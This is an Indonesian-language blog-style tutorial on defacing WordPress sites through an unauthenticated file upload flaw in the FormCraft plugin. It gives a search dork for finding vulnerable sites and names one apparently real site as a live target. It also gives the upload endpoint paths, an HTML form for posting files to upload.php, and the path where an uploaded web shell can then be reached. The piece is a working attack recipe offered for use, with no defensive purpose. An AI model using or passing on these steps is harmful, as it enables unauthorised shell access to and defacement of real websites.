Deface Website Dengan Wordpress Plugins FormCraft Upload Vulnerability

Dork : 

inurl:"wp-content//plugins/formcraft/"

Live Target :

 http://quiropracticoqro.com/

Exploit :
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/

Script CSRF :

<form method="POST" action="http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>

Simpan Dengan Format html : Save As > localhost.html 

Cari target menggunakan dork di atas , Lalu masukkan exploit yang di atas  Jika Vuln akan nampak seperti ini :

Sekarang tinggal edit targetnya di Script CSRF yang tadi .. Sekarang buka filenya dengan browser yang mastah gunakan..
Lalu upload deh shell kesangannya  Setelah upload maka akan nampak seperti ini :

Shell Access : 

http://www.site.com/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php

Jika Berhasil Akan Muncul Shell Kesayangan Sobat, Tapi Jika Ga Muncul Berarti Sobat Kurang Ganteng :v
Sekian, Semoga bermanfaat

Tweet